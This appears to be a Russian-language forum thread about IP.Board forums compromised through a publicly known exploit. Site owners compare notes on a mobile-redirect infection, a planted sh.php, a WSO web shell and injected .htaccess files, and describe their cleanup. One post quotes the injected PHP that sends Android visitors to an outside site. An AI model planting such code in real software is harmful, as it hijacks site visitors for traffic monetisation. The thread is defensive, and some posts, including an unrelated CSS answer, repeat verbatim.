Sergey

Забавная вещь вышла. Опять появился редирект... Тот же на давидсона и там же. Исправил, пошёл ковырять, чтобы что-нибудь найти. Наткнулся на понял, что делал почти аналогичные действия с теми же самыми файлами-картинками и никак не мог найти ответа в интернете, собственно в то же время и зарегистрировался тут, чтобы попытаться найти ответы, но увы и ах (ну что и не удивительно, ведь статья вышла позже). В итоге зачитал ещё что спасибо отдельное), полез в cashe и отрыл там ещё один вирь(к слову не sh.php, а просто абракадабра.php), который был незамедлительно удалён...
Жду новых поступлений...

Вот скрипт:

Публикую эту тему здесь, т.к. она действительно важная.

В публичном доступе был найден эксплоит для IP.Board начиная от версий 3.1 и заканчивая 3.3.4 включительно, который может быть использован для внедрения стороннего PHP кода в ваш форум.

Патч от IPS был выпущен после публикации этого эксплоита, поэтому сейчас огромное количество форумов подвержено взлому.
мной случай взлома сайта является ничем иным как результат использования этой уязвимости.

Всем владельцам форумов на IP.Board необходимо установить ,?do=embed' frameborder='0' data-embedContent> в противном случае вам форум может быть подвергнут взлому.

Внимание!
Проверьте директорию /cache/ которая находится в корне вашего форума. Если в ней находится файл sh.php (это стандартное имя файла, который создается в результате использования эксплоита) — ваш сайт подвергся взлому.
Вам необходимо срочно поменять пароль для подключения к базе данных, а так же запросить у хостера список PHP файлов которые были изменены за последние 7 дней.
Необязательно появление новых файлов, могут быть отредактированы системные файлы IP.Board.
После этого вы можете обратиться ко мне, отправив список измененных файлов и свои контактные данные, для получения помощи с восстановлением форума.
Обязательно установите (в него входит и предыдущий патч) для обеспечения должной защиты вашего форума.

Скачал сайт на комп, ввел поиск и нашел этот код в папке big-benz.ru/admin/sources/base/ipsRegistry.php
 
Содержание в самом низу файла такое:
$mbrowser = mobile_device_detect(); $is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0; if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) { setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/"); header("Location: __www.kirkdavidson.com/js/fp.html"); exit; }

Pashok(one), сегодня до обеда возился на своём форуме с подобной проблемой. Докопался до того, что нашёл у себя веб-шелл wso 2.5. Подробнее гугл расскажет, что это такое. В кратце история таже - редирект со всех мобильных клиентов на другие сайты с целью монетизации мобильного трафика. В общем вирусняк залил кучу однообразных .htaccess файлов во все папки и подпапки. Советую тебе проверить. До этого ниодного .htaccess не было.
Бэкдор вируса обнаружил в папке admin applications прямо в корне лежал файл со странным названием, собственно в нём куча зашифрованного кода, который удалось декодировать, слегка погуглив...
В общем удалил все .htaccess с сайта скриптом, сменил пароли от бд, админки и прочего, чего и тебе советую, да и всем, кто столкнулся с подобной проблемой.

Добрый вечер!
Уточните пожалуйста, цвет фона какого элемента поменялся? Вы можете предоставить ссылку на форум с чатом(если нет желания тут, то в личную). Возможно мне удастся дать совет. Ещё хотелось бы узнать, а какой именно чат вы поставили(т.е. ссылку на скачанный архив).

Привет, Prowler!
Заходишь в Управление стилями и шаблонами > Управление шаблонами в IP.Board, там открываешь вкладку CSS, тебе нужен файл ipb_styles.css. В нём с 1062 строки ( у меня так в дефолтном ) начинаются табличные стили /* TABLE STYLES */, в нём тебя интересует стиль для table.ipb_table td (строка 1071 у меня), собственно если чуток шаришь в CSS, то поиграй со стилями - толщиной границы и т.д.
Собственно код, который выводит список форумов находится рядом в списке шаблонов в подпункте "Список форумов" boardIndesTemplate.
Вроде нигде не соврал. Если что поправьте.
Удачи!

Привет, Prowler!
Заходишь в Управление стилями и шаблонами > Управление шаблонами в IP.Board, там открываешь вкладку CSS, тебе нужен файл ipb_styles.css. В нём с 1062 строки ( у меня так в дефолтном ) начинаются табличные стили /* TABLE STYLES */, в нём тебя интересует стиль для table.ipb_table td (строка 1071 у меня), собственно если чуток шаришь в CSS, то поиграй со стилями - толщиной границы и т.д.
Собственно код, который выводит список форумов находится рядом в списке шаблонов в подпункте "Список форумов" boardIndesTemplate.
Вроде нигде не соврал. Если что поправьте.
Удачи!

Pashok(one), сегодня до обеда возился на своём форуме с подобной проблемой. Докопался до того, что нашёл у себя веб-шелл wso 2.5. Подробнее гугл расскажет, что это такое. В кратце история таже - редирект со всех мобильных клиентов на другие сайты с целью монетизации мобильного трафика. В общем вирусняк залил кучу однообразных .htaccess файлов во все папки и подпапки. Советую тебе проверить. До этого ниодного .htaccess не было.
Бэкдор вируса обнаружил в папке admin applications прямо в корне лежал файл со странным названием, собственно в нём куча зашифрованного кода, который удалось декодировать, слегка погуглив...
В общем удалил все .htaccess с сайта скриптом, сменил пароли от бд, админки и прочего, чего и тебе советую, да и всем, кто столкнулся с подобной проблемой.